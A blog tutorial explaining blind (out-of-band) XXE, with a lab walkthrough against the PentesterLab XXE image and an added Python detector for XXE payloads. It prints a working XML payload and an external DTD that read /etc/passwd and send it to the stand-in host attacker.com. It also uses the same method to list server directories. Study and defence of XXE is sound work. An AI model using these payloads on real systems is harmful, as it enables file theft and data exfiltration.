Thursday, August 1, 2019

XML External Entities - Out of band - Part III

XXE Attack -


Hi Techies!! In XML External Entities - Inband - Part II, we discussed the Inband XXE Attack. In this part, we will be discussing Out of Band XXE Attack along with an example which would illustrate the attack in detail.

What is Out of Band?

Out of Band XXE (also called Blind XXE) is an attack in which the attacker does not get an immediate response from the server. The exploitation process is similar to Inband, i.e., it uses parameter entities and also involves the creation of an external DTD (Document Type Definition). The major difference between the two attacks is that in Out of Band the attacker abuses the target's XML parser into making an additional request to the attacker's web server, and that request carries the contents of the local file.


For example:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE data SYSTEM "http://attacker.com/jagskap.dtd">
<data>&e1;</data>


jagskap.dtd
<!ENTITY % p1 SYSTEM "file:///etc/passwd">
<!ENTITY % p2 "<!ENTITY e1 SYSTEM 'http://attacker.com/jagskap?%p1;'>">
%p2;


The Out of Band XXE Attack is conducted as follows:
  • First, the XML parser makes a request to the attacker's DTD file at http://attacker.com/jagskap.dtd.
  • After the jagskap.dtd file is fetched, the %p1 entity is processed by the XML parser, which loads the content of the /etc/passwd file into p1.
  • The %p2 entity creates a general entity called &e1, which contains a URL. This URL includes the file contents of p1. The URL looks like http://attacker.com/jagskap?root:!:0:0::/:/usr/bin/sh...
  • Finally, after the URL is constructed, the XML parser processes the &e1 entity, which makes a request to the attacker's server.
  • The attacker can log the request on their end and reconstruct the file from the log entry.
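As an added example (not part of the original post), the following Python checks an incoming XML body and a fetched DTD for the building blocks of the attack just described, and refuses to parse any document that declares a DOCTYPE at all, which is the simplest defence against both the Inband and the Out of Band variants. The two sample documents are the payload and jagskap.dtd shown above, embedded here as constructed test data; the indicator names are my own.

```python
import re
import xml.etree.ElementTree as ET

# Constructed samples: the OOB payload and external DTD from the post,
# plus a benign document for comparison.
OOB_PAYLOAD = b"""<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE data SYSTEM "http://attacker.com/jagskap.dtd">
<data>&e1;</data>"""

EXTERNAL_DTD = b"""<!ENTITY % p1 SYSTEM "file:///etc/passwd">
<!ENTITY % p2 "<!ENTITY e1 SYSTEM 'http://attacker.com/jagskap?%p1;'>">
%p2;"""

BENIGN = b'<?xml version="1.0"?><data><user>alice</user></data>'

# Each indicator corresponds to one step of the attack chain:
# external DTD reference, parameter entity, local file read,
# outbound request via a general entity, and a parameter entity
# reference nested inside another entity's value.
INDICATORS = [
    ("doctype", re.compile(rb"<!DOCTYPE\b")),
    ("external-dtd", re.compile(rb"<!DOCTYPE\s+\S+\s+(?:SYSTEM|PUBLIC)\b")),
    ("parameter-entity", re.compile(rb"<!ENTITY\s+%\s+\w+")),
    ("local-file-uri", re.compile(rb"SYSTEM\s+['\"]file:")),
    ("outbound-entity", re.compile(rb"<!ENTITY\s+\w+\s+SYSTEM\s+['\"]https?://")),
    ("nested-pe-reference", re.compile(rb"<!ENTITY[^>]*%\w+;[^>]*>")),
]


def xxe_indicators(doc):
    """Return the names of the attack building blocks present in doc."""
    return [name for name, rx in INDICATORS if rx.search(doc)]


def safe_parse(doc):
    """Parse doc only if it shows no XXE indicators; return (root, reason).

    Rejecting every DOCTYPE is deliberate: a legitimate API client has no
    business sending a DTD, and no DTD means no entities to resolve.
    """
    found = xxe_indicators(doc)
    if found:
        return None, "rejected: " + ", ".join(found)
    return ET.fromstring(doc), "ok"


if __name__ == "__main__":
    for label, doc in (("payload", OOB_PAYLOAD), ("dtd", EXTERNAL_DTD), ("benign", BENIGN)):
        print(label, xxe_indicators(doc), safe_parse(doc)[1])
```

Logging the rejection reason gives the SOC a direct signal for the probing shown in the demo: a DOCTYPE with a SYSTEM URL arriving at a JSON or form endpoint is worth an alert on its own.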


DEMO


For the demo purpose, we will be using Pentesterlab ISO. You can download the ISO file from https://pentesterlab.com/exercises/play_xxe/iso.


Step 1: Run the ISO file in the Virtual Box and check the IP Address.
  • Target - 192.168.56.102
Step 2: Now with the attacker machine navigate to http://192.168.56.102/login.


Exhibit 1

Step 3: Intercept the request using a proxy tool like Burp Suite, as shown in Exhibit 2.


Exhibit 2

Step 4: Let us check if the application is vulnerable to XXE Injection. To do so, let us modify the request by changing the Content-Type to text/xml and adding XML data to the POST body, as shown in Exhibit 3.

Exhibit 3

It can be observed that the application server responds with "Invalid XML", which tells us that the server parses XML. The only issue is that no data is reflected back from the server side, making this a blind attack. So even if we request the /etc/passwd file from the server, the server won't send it in the response. Thus we need to find another way. Here, an external DTD plays an important role: we will make use of an external DTD to get the /etc/passwd file.

Step 5: Create a DTD file named "jagskap.dtd" with the content shown in Exhibit 4 and host the file on the attacker's server using XAMPP or Apache.


Exhibit 4

Step 6: Finally, we need to send the XML entity payload, as shown in Exhibit 5.


Exhibit 5

Step 7: When executed, we can see that the target server makes a request to the attacker's server as intended and dumps the /etc/passwd file content in the request, as shown in Exhibit 6.


Exhibit 6

Step 8: Further, we can view other files and directories as well. To do so, go back to the content of the /etc/passwd file: we can see that a play user exists. The home directory of this user is /opt/play-2.1.3/xxe/, as shown in Exhibit 7, and there is a good chance that this is where the application is located.


Exhibit 7

Step 9: Depending on the XML parser, it's also possible to retrieve the listing of a directory. The only way to see if it works is to try. Here we can modify the DTD file to point to /opt/play-2.1.3/xxe/, as shown in Exhibit 8.


Exhibit 8

Step 10: Let us send this request to the server, as shown in Exhibit 9.


Exhibit 9

Step 11: Bingo!!!! The content of the directory is displayed as part of the request, as shown in Exhibit 10.


Exhibit 10


I hope this blog helped you clear your concept of Out of Band XXE. The next part, XML External Entities - Billion Laughter Attack - Part IV, talks about how XXE can be used for a Denial of Service attack. Please like, share and comment.
